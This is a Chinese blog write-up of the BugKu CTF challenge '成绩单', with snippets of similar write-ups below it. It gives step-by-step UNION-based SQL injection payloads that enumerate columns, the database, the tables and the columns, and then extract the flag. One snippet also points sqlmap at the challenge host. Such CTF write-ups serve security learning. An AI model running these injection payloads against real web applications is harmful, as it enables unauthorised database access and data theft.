bugku之成绩单

最新推荐文章于 2020-04-29 16:54:33 发布
最新推荐文章于 2020-04-29 16:54:33 发布
阅读量156 收藏
点赞数
分类专栏: ctf-web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Seaern/article/details/97292648
版权

题目链接
打开链接发现是一个表单
分别输入1,2,3有数据传回

那就应该是 sql注入呀~

1.首先爆字段

在输入框提交

id=1' order by 4#		正常返回数据

在这里插入图片描述

id=1' order by 5#		返回空

在这里插入图片描述
即可确定字段数为4

2.爆数据库名

0' union select 1,database(),user(),version()#

在这里插入图片描述
3.根据数据库名查询表名

id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'),user(),version()#

注意固定格式
[图片]
4.根据表名查列名

id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g'),user(),version()#

[图片]
5.根据列名查数据

id=0' union select 1,(select skctf_flag from fl4g),user(),version()#

在这里插入图片描述

有关的sql注入学习链接

1.Web安全篇之SQL注入攻击
2.CTF之SQL注入详解

偷懒不学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu——成绩单
D-R0s1的博客
10-08 868
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
BUGKU-----成绩单
weixin_43803070的博客
07-04 188
放暑假的第三天,开启暑假的刷题之路,怎么说呢,学了三个月的安全,还是需要打一下基础,所以就来bugku刷题咯。 拿道题,一看就是sql注入啦。啥都不说直接上payload。 ** 基础知识: ** 在做题之前必须要说一下基础知识: mysql中有一个数据库information里面有三个表,每个表中都有字段。如上图 1' //1'报错说明存在注入啦。 2. 1'--+ //我们加上注释之...
Bugku成绩单
Newbiek的博客
04-02 894
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
bugku---成绩单
LuckySec
11-16 500
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
成绩单bugku--web)
小白的劝退之路
04-29 404
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku杂项题writeup
11-22
bugku杂项题writeup
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku 成绩单详解
qq_35811830的博客
01-26 1221
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
bugku-web-成绩单
a3uRa的一个窝
08-29 694
非常简单的sql注入 1 1’ 1‘# id=1' order by 1# id=1' order by 2# id=1' order by 3# id=1' order by 4# id=1' order by 5# id=' union select 1,2,3,4# id=' union select 1,2,3,database()# id=' union select 1,2,3,...
bugkuctf 成绩单
舞动的獾
06-20 664
bugkuctf成绩单 用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高. id=1' order by 5# 没有回显,所以试试4 id=1' order by 4# 所以可以知道有四列 尝试联合查询 记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...
bugku 成绩单 总结
DreamHigh
08-28 2951
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
bugku 成绩单
rommel的博客
08-23 7241
成绩查询 龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1' union select 1,2,3,database(
BugkuCTF 成绩单
3tu6b0rn的博客
04-02 1088
可以看出应该为sql联合注入 SQL注入之联合查询注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 构造语句 id=0' union select 1,2,3,4# 查询数据库 id=0' union select 1,2,3,database()#找到数据库 skctf_flag 查询数据表id=0...
BUGKU web--writeup
Sanky0u的博客
08-15 1万+
因为已经看到过很多关于bugku平台上面web题的writeup,我想自己就不需要每道题都写了,只写自己比较有收获的几题的writeup,并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道题提示上传php文件,但选择php文件上传的时候又提示非图片文件。解法1:将一个php文件的后缀名改成.php.jpg或者.php.png,然后选择这个文件,点击上传的时候用burpsuite抓包,改文件
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1644
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
bugku sodirty
最新发布
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值